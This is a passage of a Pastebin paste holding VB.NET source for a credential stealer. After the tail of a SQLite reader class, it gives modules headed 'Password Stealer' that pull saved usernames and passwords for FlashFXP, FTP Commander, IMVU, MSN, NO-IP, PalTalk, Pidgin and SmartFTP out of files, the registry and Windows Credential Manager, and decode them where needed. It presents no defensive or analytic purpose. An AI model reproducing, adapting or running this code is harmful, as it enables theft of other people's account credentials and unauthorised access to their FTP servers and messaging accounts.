  646.                 Dim columnName As [String] = ""
  647.                 Dim columnType As Integer = 0
  648.                 Dim columnValues As Object() = New Object(columnCount - 1) {}
  649.                 For i As Integer = 0 To columnCount - 1
  650.                     columnName = PointerToString(sqlite3_column_name(statement, i))
  651.                     columnType = sqlite3_column_type(statement, i)
  652.                     Select Case columnType
  653.                         Case CInt(SQLiteDataTypes.INT)
  654.                             If True Then
  655.                                 table.Columns.Add(columnName, Type.[GetType]("System.Int32"))
  656.                                 columnValues(i) = sqlite3_column_int(statement, i)
  657.                                 Exit Select
  658.                             End If
  659.                         Case CInt(SQLiteDataTypes.FLOAT)
  660.                             If True Then
  661.                                 table.Columns.Add(columnName, Type.[GetType]("System.Single"))
  662.                                 columnValues(i) = sqlite3_column_double(statement, i)
  663.                                 Exit Select
  664.                             End If
  665.                         Case CInt(SQLiteDataTypes.TEXT)
  666.                             If True Then
  667.                                 table.Columns.Add(columnName, Type.[GetType]("System.String"))
  668.                                 columnValues(i) = PointerToString(sqlite3_column_text(statement, i))
  669.                                 Exit Select
  670.                             End If
  671.                         Case CInt(SQLiteDataTypes.BLOB)
  672.                             If True Then
  673.                                 table.Columns.Add(columnName, Type.[GetType]("System.String"))
  674.                                 columnValues(i) = PointerToString(sqlite3_column_blob(statement, i))
  675.                                 Exit Select
  676.                             End If
  677.                         Case Else
  678.                             If True Then
  679.                                 table.Columns.Add(columnName, Type.[GetType]("System.String"))
  680.                                 columnValues(i) = ""
  681.                                 Exit Select
  682.                             End If
  683.                     End Select
  684.                 Next
  685.                 table.Rows.Add(columnValues)
  686.             End If
  687.             Return sqlite3_step(statement)
  688.         End Function
  689.         Private Function ReadNextRow(ByVal statement As IntPtr, ByRef table As DataTable) As Integer
  690.             Dim columnCount As Integer = sqlite3_column_count(statement)
  691.  
  692.             Dim columnType As Integer = 0
  693.             Dim columnValues As Object() = New Object(columnCount - 1) {}
  694.  
  695.             For i As Integer = 0 To columnCount - 1
  696.                 columnType = sqlite3_column_type(statement, i)
  697.  
  698.                 Select Case columnType
  699.                     Case CInt(SQLiteDataTypes.INT)
  700.                         If True Then
  701.                             columnValues(i) = sqlite3_column_int(statement, i)
  702.                             Exit Select
  703.                         End If
  704.                     Case CInt(SQLiteDataTypes.FLOAT)
  705.                         If True Then
  706.                             columnValues(i) = sqlite3_column_double(statement, i)
  707.                             Exit Select
  708.                         End If
  709.                     Case CInt(SQLiteDataTypes.TEXT)
  710.                         If True Then
  711.                             columnValues(i) = PointerToString(sqlite3_column_text(statement, i))
  712.                             Exit Select
  713.                         End If
  714.                     Case CInt(SQLiteDataTypes.BLOB)
  715.                         If True Then
  716.                             columnValues(i) = PointerToString(sqlite3_column_blob(statement, i))
  717.                             Exit Select
  718.                         End If
  719.                     Case Else
  720.                         If True Then
  721.                             columnValues(i) = ""
  722.                             Exit Select
  723.                         End If
  724.                 End Select
  725.             Next
  726.             table.Rows.Add(columnValues)
  727.             Return sqlite3_step(statement)
  728.         End Function
  729.         Private Function StringToPointer(ByVal str As [String]) As IntPtr
  730.             If str Is Nothing Then
  731.                 Return IntPtr.Zero
  732.             Else
  733.                 Dim encoding__1 As Encoding = Encoding.UTF8
  734.                 Dim bytes As [Byte]() = encoding__1.GetBytes(str)
  735.                 Dim length As UInteger = bytes.Length + 1
  736.                 Dim pointer As IntPtr = HeapAlloc(GetProcessHeap(), 0, DirectCast(length, UInt32))
  737.                 Marshal.Copy(bytes, 0, pointer, bytes.Length)
  738.                 Marshal.WriteByte(pointer, bytes.Length, 0)
  739.                 Return pointer
  740.             End If
  741.         End Function
  742.         Private Function PointerToString(ByVal ptr As IntPtr) As [String]
  743.             If ptr = IntPtr.Zero Then
  744.                 Return Nothing
  745.             End If
  746.  
  747.             Dim encoding__1 As Encoding = Encoding.UTF8
  748.  
  749.             Dim length As Integer = GetPointerLenght(ptr)
  750.             Dim bytes As [Byte]() = New [Byte](length - 1) {}
  751.             Marshal.Copy(ptr, bytes, 0, length)
  752.             Return encoding__1.GetString(bytes, 0, length)
  753.         End Function
  754.         Private Function GetPointerLenght(ByVal ptr As IntPtr) As Integer
  755.             If ptr = IntPtr.Zero Then
  756.                 Return 0
  757.             End If
  758.             Return lstrlen(ptr)
  759.         End Function
  760.     End Class
  761. End Namespace
  762.  
  763.  
  764. 'FlashFXP Stealer function
  765.  
  766.  
  767. Module FlashFXP
  768.     Function FlashFXP() As String
  769.         Dim sPath As String = Replace(Environ$("APPDATA"), Environ$("Username"), "All Users") & "\FlashFXP\" & "3" & "\quick.dat"
  770.         Dim sFile As String = ReadFile(sPath)
  771.         Dim sHost As String = Cut(sFile, "IP=", vbNewLine)
  772.         Dim sPort As String = Cut(sFile, "port=", vbNewLine)
  773.         Dim sUser As String = Cut(sFile, "user=", vbNewLine)
  774.         Dim sPwd As String = Cut(sFile, "pass=", vbNewLine)
  775.         Dim sEntry As String = Cut(sFile, "created=", vbNewLine)
  776.  
  777.         If Not sUser = "" Then
  778.             Try
  779.                 FlashFXP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
  780.                 Dim nl As String = vbNewLine
  781.                 Form1.ztext.AppendText(nl)
  782.                 Form1.ztext.AppendText("============FlashFXP==============")
  783.                 Form1.ztext.AppendText(nl)
  784.                 Form1.ztext.AppendText("Entry: " & sEntry)
  785.                 Form1.ztext.AppendText(nl)
  786.                 Form1.ztext.AppendText("Host: " & sHost)
  787.                 Form1.ztext.AppendText(": " & sPort)
  788.                 Form1.ztext.AppendText(nl)
  789.                 Form1.ztext.AppendText("User: " & sUser)
  790.                 Form1.ztext.AppendText(nl)
  791.                 Form1.ztext.AppendText("Password: " & sPwd)
  792.                 Form1.ztext.AppendText("=============================")
  793.                 Form1.ztext.AppendText(nl)
  794.             Catch ex As Exception
  795.                 Form1.ztext.AppendText("============FlashFXP==============")
  796.                 Form1.ztext.AppendText(vbNewLine)
  797.                 Form1.ztext.AppendText("FlashFXP Couldn't Be Recovered!")
  798.                 Form1.ztext.AppendText(vbNewLine)
  799.                 Form1.ztext.AppendText("=================================")
  800.             End Try
  801.         Else
  802.         End If
  803.     End Function
  804. End Module
  805. [/php]
  806.  
  807. [b]FTP Commande Password Stealerr[/b]
  808.  
  809. [php]
  810. Module FTPCommander
  811.     Function FtpCommander() As String
  812.         Dim sPath As String = Replace(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString"), "uninstall.exe", vbNullString) & "Ftplist.txt"
  813.         Dim sFile As String = ReadLine(sPath, -1)
  814.         Dim sHost As String = Cut(sFile, ";Server=", ";Port=")
  815.         Dim sPort As String = Cut(sFile, ";Port=", ";Password=")
  816.         Dim sUser As String = Cut(sFile, ";User=", ";Anonymous=")
  817.         Dim sPwd As String = Cut(sFile, ";Password=", ";User=")
  818.         Dim sEntry As String = Cut(sFile, "Name=", ";Server=")
  819.  
  820.         If Not sUser = "" Then
  821.             Try
  822.                 FtpCommander = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd
  823.                 Dim nl As String = vbNewLine
  824.                 Form1.ztext.AppendText(nl)
  825.                 Form1.ztext.AppendText("============FTP Commander==============")
  826.                 Form1.ztext.AppendText(nl)
  827.                 Form1.ztext.AppendText("Entry: " & sEntry)
  828.                 Form1.ztext.AppendText(nl)
  829.                 Form1.ztext.AppendText("Host: " & sHost)
  830.                 Form1.ztext.AppendText(": " & sPort)
  831.                 Form1.ztext.AppendText(nl)
  832.                 Form1.ztext.AppendText("User: " & sUser)
  833.                 Form1.ztext.AppendText(nl)
  834.                 Form1.ztext.AppendText("Password: " & sPwd)
  835.                 Form1.ztext.AppendText("=============================")
  836.                 Form1.ztext.AppendText(nl)
  837.             Catch ex As Exception
  838.             End Try
  839.         Else
  840.         End If
  841.     End Function
  842. End Module
  843. [/php]
  844.  
  845. [b]IMVU Password Stealer[/b]
  846.  
  847. [php]
  848. Module Imvu
  849.     Function ReadKey(ByRef hKey As String) As Object ' // Function for Read REG Values
  850.         On Error GoTo Error_Renamed ' // If Error dont Display Error
  851.         Dim X As Object ' //
  852.         X = CreateObject("WScript.shell") ' // Create REG Object
  853.         ReadKey = X.regread(hKey) ' // Read The Key
  854.         Exit Function
  855. Error_Renamed: ReadKey = vbNullString ' // If Error Readkey = ""
  856.     End Function
  857.     Public Function Hex2Ascii(ByVal Text As String) As String
  858.         Dim Value As Object
  859.         Dim num As Object
  860.         Dim i As Object ' // Simple Function for Pass Hex to Ascii
  861.         Value = Nothing
  862.         For i = 1 To Len(Text) ' Len of Encripted Text
  863.             num = Mid(Text, i, 2) ' // Go Chr by Chr
  864.             Value = Value & Chr(Val("&h" & num)) ' // Pass from Hex
  865.             i = i + 1 ' // +1
  866.         Next i ' Next Chr
  867.  
  868.         Hex2Ascii = Value ' //
  869.     End Function
  870.     Public Function DoToVu() As String
  871.         Dim sUser, sPass As String ' // Some Variables
  872.         sUser = "HKEY_CURRENT_USER\Software\IMVU\username\" ' // Username REG Path
  873.         sPass = "HKEY_CURRENT_USER\Software\IMVU\password\" ' // Password REG Path
  874.         Dim nl As String = vbNewLine
  875.         Form1.ztext.AppendText(nl)
  876.         Form1.ztext.AppendText("============IMVU==============")
  877.         Form1.ztext.AppendText(nl)
  878.         Form1.ztext.AppendText("Username: " & ReadKey(sUser))
  879.         Form1.ztext.AppendText(nl)
  880.         Form1.ztext.AppendText("Password: " & Hex2Ascii(ReadKey(sPass)))
  881.         Form1.ztext.AppendText(nl)
  882.         Form1.ztext.AppendText("=============================")
  883.         Form1.ztext.AppendText(nl)
  884. Sex:
  885.         Exit Function
  886.     End Function
  887. End Module
  888.  
  889.  
  890. 'MSN Password Stealer
  891.  
  892. [php]
  893. Imports System.Collections.Generic
  894. Imports System.Text
  895. Imports System.Runtime.InteropServices
  896. Imports System.IO
  897.     Module MSN
  898.     <DllImport("advapi32.dll", SetLastError:=True, CharSet:=CharSet.Unicode)> _
  899.     Public Function CredEnumerateW(ByVal filter As String, ByVal flag As UInteger, ByVal count As UInteger, ByVal pCredentials As IntPtr) As Boolean
  900.     End Function
  901.     <DllImport("crypt32", CharSet:=CharSet.Auto, SetLastError:=True)> _
  902.     Friend Function CryptUnprotectData(ByRef dataIn As DATA_BLOB, ByVal ppszDataDescr As Integer, ByVal optionalEntropy As Integer, ByVal pvReserved As Integer, ByVal pPromptStruct As Integer, ByVal dwFlags As Integer, _
  903.      ByVal pDataOut As DATA_BLOB) As Boolean
  904.     End Function
  905.     Friend Structure CREDENTIAL
  906.         Public Flags As Integer
  907.         Public Type As Integer
  908.         <MarshalAs(UnmanagedType.LPWStr)> _
  909.         Public TargetName As String
  910.         <MarshalAs(UnmanagedType.LPWStr)> _
  911.         Public Comment As String
  912.         Public LastWritten As Long
  913.         Public CredentialBlobSize As Integer
  914.         Public CredentialBlob As Integer
  915.         Public Persist As Integer
  916.         Public AttributeCount As Integer
  917.         Public Attributes As IntPtr
  918.         <MarshalAs(UnmanagedType.LPWStr)> _
  919.         Public TargetAlias As String
  920.         <MarshalAs(UnmanagedType.LPWStr)> _
  921.         Public UserName As String
  922.     End Structure
  923.     Private Cred As CREDENTIAL
  924.     Friend Structure DATA_BLOB
  925.         Public cbData As Integer
  926.         Public pbData As Integer
  927.     End Structure
  928.     Friend Structure UserDetails
  929.         Public uName As String
  930.         Public uPass As String
  931.     End Structure
  932.     Public count As UInteger
  933.     Public pCredentials As IntPtr = IntPtr.Zero
  934.     Public dataIn As DATA_BLOB
  935.     Public dataOut As DATA_BLOB
  936.     Public uDetail As UserDetails
  937.     Public Function getPwd() As String()
  938.         Password()
  939.         Dim pass As String() = {uDetail.uName, uDetail.uPass}
  940.         Return pass
  941.  
  942.     End Function
  943.     Public Sub Password()
  944.         Try
  945.             Dim ptr As IntPtr = Marshal.ReadIntPtr(pCredentials, 0 * 4)
  946.             Cred = CType(Marshal.PtrToStructure(ptr, Cred.[GetType]()), CREDENTIAL)
  947.             dataIn.pbData = Cred.CredentialBlob
  948.             dataIn.cbData = Cred.CredentialBlobSize
  949.             CryptUnprotectData(dataIn, 0, 0, 0, 0, 1, _
  950.              dataOut)
  951.             dataOut.pbData = dataIn.pbData
  952.  
  953.             uDetail.uName = Cred.UserName
  954.             uDetail.uPass = (Marshal.PtrToStringUni(New IntPtr(dataOut.pbData)))
  955.             Dim nl As String = vbNewLine
  956.             Form1.ztext.AppendText(nl)
  957.             Form1.ztext.AppendText("============MSN==============")
  958.             Form1.ztext.AppendText(nl)
  959.             Form1.ztext.AppendText("Username: " & uDetail.uName)
  960.             Form1.ztext.AppendText(nl)
  961.             Form1.ztext.AppendText("Password: " & uDetail.uPass)
  962.             Form1.ztext.AppendText(nl)
  963.             Exit Sub
  964.         Catch x As Exception
  965.             Dim nl As String = vbNewLine
  966.             Form1.ztext.AppendText(nl)
  967.             Form1.ztext.AppendText("============MSN==============")
  968.             Form1.ztext.AppendText(nl)
  969.             Form1.ztext.AppendText("MSN Could not be recovered!")
  970.             Form1.ztext.AppendText(nl)
  971.             Exit Sub
  972.         End Try
  973.     End Sub
  974. End Module
  975.  
  976.  
  977. 'NO-IP Password Stealer
  978.  
  979.  
  980. Module No_IP
  981.     Public Function base64Decode(ByVal data As String) As String
  982.         Try
  983.             Dim encoder As New System.Text.UTF8Encoding()
  984.             Dim utf8Decode As System.Text.Decoder = encoder.GetDecoder()
  985.             Dim todecode_byte As Byte() = Convert.FromBase64String(Data)
  986.             Dim charCount As Integer = utf8Decode.GetCharCount(todecode_byte, 0, todecode_byte.Length)
  987.             Dim decoded_char As Char() = New Char(charCount - 1) {}
  988.             utf8Decode.GetChars(todecode_byte, 0, todecode_byte.Length, decoded_char, 0)
  989.             Dim result As String = New [String](decoded_char)
  990.             Return result
  991.         Catch e As Exception
  992.         End Try
  993.     End Function
  994.     Function IpRecord() As String
  995.         Try
  996.             IpRecord = Nothing
  997.             Dim Username As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Username", Nothing)
  998.             Dim Password As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Password", Nothing)
  999.             Dim nl As String = vbNewLine
  1000.             Form1.ztext.AppendText(nl)
  1001.             Form1.ztext.AppendText("============IMVU==============")
  1002.             Form1.ztext.AppendText(nl)
  1003.             Form1.ztext.AppendText("Username: " & Username)
  1004.             Form1.ztext.AppendText(nl)
  1005.             Form1.ztext.AppendText("Password: " & base64Decode(Password))
  1006.             Form1.ztext.AppendText(nl)
  1007.             Form1.ztext.AppendText("=============================")
  1008.             Form1.ztext.AppendText(nl)
  1009.         Catch
  1010.             Dim nl As String = vbNewLine
  1011.             Form1.ztext.AppendText(nl)
  1012.             Form1.ztext.AppendText("============IMVU==============")
  1013.             Form1.ztext.AppendText(nl)
  1014.             Form1.ztext.AppendText("IMVU Not Installed!")
  1015.             Form1.ztext.AppendText(nl)
  1016.         End Try
  1017.     End Function
  1018. End Module
  1019.  
  1020.  
  1021. 'PalTalk Password Stealer
  1022.  
  1023.  
  1024. Module PalTalk
  1025.     Public Function GetHDSerial() As String
  1026.         Dim disk As New System.Management.ManagementObject( _
  1027.         "Win32_LogicalDisk.DeviceID=""C:""")
  1028.         Dim diskPropertyA As System.Management.PropertyData = _
  1029.           disk.Properties("VolumeSerialNumber")
  1030.         Return diskPropertyA.Value.ToString()
  1031.     End Function
  1032.     Public Function paltalkscene() As String
  1033.         Try
  1034.             Dim ser() As Char = GetHDSerial().ToCharArray
  1035.             Dim reg As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
  1036.             Dim out As String = ""
  1037.             reg = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Paltalk")
  1038.             Dim users As String() = reg.GetSubKeyNames()
  1039.             reg.Close()
  1040.             For Each s As String In users
  1041.                 Dim t, o, i, x As Integer
  1042.                 Dim pass As String = Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\Software\Paltalk\" & s, "pwd", "")
  1043.                 Dim chr1 As Char() = pass.ToCharArray
  1044.                 Dim passarr(pass.Length / 4) As String
  1045.                 While t <= UBound(chr1) - 4
  1046.                     If t < UBound(chr1) - 4 Then
  1047.                         passarr(o) = chr1(t) & chr1(t + 1) & chr1(t + 2)
  1048.                     End If
  1049.                     t += 4
  1050.                     o += 1
  1051.                 End While
  1052.                 Dim key As String = ""
  1053.                 For Each c As Char In s
  1054.                     key += c
  1055.                     If i <= UBound(ser) Then
  1056.                         key += ser(i)
  1057.                     End If
  1058.                     i = i + 1
  1059.                 Next
  1060.                 key = key & key & key
  1061.                 Dim chr_arr As Char() = key.ToCharArray
  1062.                 Dim blainpass As String = ""
  1063.                 blainpass += Chr(passarr(0) - 122 - Asc(key.Substring(key.Length - 1, 1)))
  1064.                 For x = 1 To UBound(passarr)
  1065.                     Dim tempchr As Char
  1066.                     If passarr(x) Is Nothing Then
  1067.                     Else
  1068.                         tempchr = Chr(passarr(x) - x - Asc(chr_arr(x - 1)) - 122)
  1069.                         blainpass += tempchr
  1070.                     End If
  1071.                 Next x
  1072.  
  1073.                 Dim nl As String = vbNewLine
  1074.                 Form1.ztext.AppendText(nl)
  1075.                 Form1.ztext.AppendText("============PalTalk==============")
  1076.                 Form1.ztext.AppendText(nl)
  1077.                 Form1.ztext.AppendText("Username: " & s)
  1078.                 Form1.ztext.AppendText(nl)
  1079.                 Form1.ztext.AppendText("Password: " & blainpass)
  1080.                 Form1.ztext.AppendText(nl)
  1081.                 Form1.ztext.AppendText("=============================")
  1082.                 Form1.ztext.AppendText(nl)
  1083.             Next
  1084.             Return out
  1085.         Catch ex As Exception
  1086.             Dim nl As String = vbNewLine
  1087.             Form1.ztext.AppendText(nl)
  1088.             Form1.ztext.AppendText("============PalTalk==============")
  1089.             Form1.ztext.AppendText(nl)
  1090.             Form1.ztext.AppendText("PalTalk Not Installed!")
  1091.             Form1.ztext.AppendText(nl)
  1092.             Return "---"
  1093.         End Try
  1094.     End Function
  1095. End Module
  1096.  
  1097.  
  1098. 'Pidgin Password Stealer
  1099.  
  1100.  
  1101. Option Explicit On
  1102. Imports System.IO
  1103. Imports System.Xml
  1104. Module Pidgin
  1105.  
  1106.     Public Function GetPidgin() As String
  1107.         Dim ReadXML As New XmlDocument
  1108.         Dim i As Integer
  1109.         Dim OutAll = Nothing
  1110.         GetPidgin = ""
  1111.         Dim FilePath As String = Environ("appdata") & "\.purple\accounts.xml"
  1112.         If File.Exists(FilePath) <> True Then
  1113.             Exit Function
  1114.         Else
  1115.             Try
  1116.                 ReadXML.Load(FilePath)
  1117.                 Dim Protocol As XmlNodeList = ReadXML.GetElementsByTagName("protocol")
  1118.                 Dim Username As XmlNodeList = ReadXML.GetElementsByTagName("name")
  1119.                 Dim Password As XmlNodeList = ReadXML.GetElementsByTagName("password")
  1120.                 For i = 0 To Protocol.Count - 1
  1121.                     OutAll = OutAll & "Pidgin Stealer Logs!" & vbNewLine & "Protocol: " & Protocol(i).InnerText & vbCrLf _
  1122.                   & "Username: " & Username(i).InnerText & vbCrLf _
  1123.                     & "Password: " & Password(i).InnerText & vbCrLf & vbNewLine
  1124.                 Next
  1125.                 Dim nl As String = vbNewLine
  1126.                 Form1.ztext.AppendText(nl)
  1127.                 Form1.ztext.AppendText("============Pidgin==============")
  1128.                 Form1.ztext.AppendText(nl)
  1129.                 Form1.ztext.AppendText("Username: " & Username(i).InnerText)
  1130.                 Form1.ztext.AppendText(nl)
  1131.                 Form1.ztext.AppendText("Password: " & Password(i).InnerText)
  1132.                 Form1.ztext.AppendText(nl)
  1133.                 Form1.ztext.AppendText("=============================")
  1134.                 Form1.ztext.AppendText(nl)
  1135.             Catch ex As Exception
  1136.                 Dim nl As String = vbNewLine
  1137.                 Form1.ztext.AppendText(nl)
  1138.                 Form1.ztext.AppendText("============Pidgin==============")
  1139.                 Form1.ztext.AppendText(nl)
  1140.                 Form1.ztext.AppendText("Pidgin Not Installed!")
  1141.                 Form1.ztext.AppendText(nl)
  1142.                 Form1.ztext.AppendText("=============================")
  1143.                 Form1.ztext.AppendText(nl)
  1144.             End Try
  1145.         End If
  1146.     End Function
  1147. End Module
  1148.  
  1149.  
  1150. 'SmartFTP Password Stealer
  1151.  
  1152.  
  1153. Module SmartFTP
  1154.     Function SmartFTP() As String
  1155.         Dim sPath As String = Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\" & Dir(Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml")
  1156.         Dim sFile As String = ReadFile(sPath)
  1157.         Dim sHost As String = Cut(sFile, "<Host>", "</Host>")
  1158.         Dim sPort As String = Cut(sFile, "<Port>", "</Port>")
  1159.         Dim sUser As String = Cut(sFile, "<User>", "</User>")
  1160.         Dim sPwd As String = Cut(sFile, "<Password>", "</Password>")
  1161.         Dim sEntry As String = Cut(sFile, "<Name>", "</Name>")
  1162.  
  1163.         If Not sUser = "" Then
  1164.             Try
  1165.                 SmartFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Password: " + sPwd + " (Encrypt)"
  1166.                 Dim nl As String = vbNewLine
  1167.                 Form1.ztext.AppendText(nl)
  1168.                 Form1.ztext.AppendText("============SmartFTP==============")
  1169.                 Form1.ztext.AppendText(nl)
  1170.                 Form1.ztext.AppendText("Entry: " & sEntry)
  1171.                 Form1.ztext.AppendText(nl)
  1172.                 Form1.ztext.AppendText("Host: " & sHost)
  1173.                 Form1.ztext.AppendText(": " & sPort)
  1174.                 Form1.ztext.AppendText(nl)
  1175.                 Form1.ztext.AppendText("User: " & sUser)
  1176.                 Form1.ztext.AppendText(nl)
  1177.                 Form1.ztext.AppendText("Password: " & sPwd)
  1178.                 Form1.ztext.AppendText("=============================")
  1179.                 Form1.ztext.AppendText(nl)
  1180.             Catch ex As Exception
  1181.                 Form1.ztext.AppendText("============SmartFTP==============")
  1182.                 Form1.ztext.AppendText(vbNewLine)
  1183.                 Form1.ztext.AppendText("SmartFTP Couldn't Be Recovered!")
  1184.                 Form1.ztext.AppendText(vbNewLine)
  1185.                 Form1.ztext.AppendText("=================================")
  1186.             End Try
  1187.         Else
  1188.         End If
  1189.     End Function
  1190.     Function ReadFile(ByVal sFile As String) As String
  1191.         On Error Resume Next
  1192.         Dim OpenFile As New System.IO.StreamReader(sFile)
  1193.         ReadFile = OpenFile.ReadToEnd.ToString
  1194.     End Function
  1195.     Function Cut(ByVal sInhalt As String, ByVal sText As String, ByVal stext2 As String) As String
  1196.         On Error Resume Next
  1197.         Dim c() As String
  1198.         Dim c2() As String
  1199.         c = Split(sInhalt, sText)
  1200.         c2 = Split(c(1), stext2)
  1201.         Cut = c2(0)
  1202.     End Function
  1203.     Function RegRead(ByVal hKey As String) As String
  1204.         Dim wshShell As Object = CreateObject("WScript.Shell")
  1205.         On Error Resume Next
  1206.         RegRead = wshShell.RegRead(hKey)
  1207.     End Function
  1208.     Public Function ReadLine(ByVal filename As String, _
  1209.     ByVal line As Integer) As String
  1210.         Try
  1211.             Dim lines As String() = My.Computer.FileSystem.ReadAllText( _
  1212.               filename, System.Text.Encoding.Default).Split(vbCrLf)
  1213.             If line > 0 Then
  1214.                 Return lines(line - 1)
  1215.             ElseIf line < 0 Then
  1216.                 Return lines(lines.Length + line - 1)
  1217.             Else
  1218.                 Return ""
  1219.             End If
  1220.         Catch ex As Exception
  1221.             Return ""
  1222.         End Try
  1223.     End Function
  1224. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!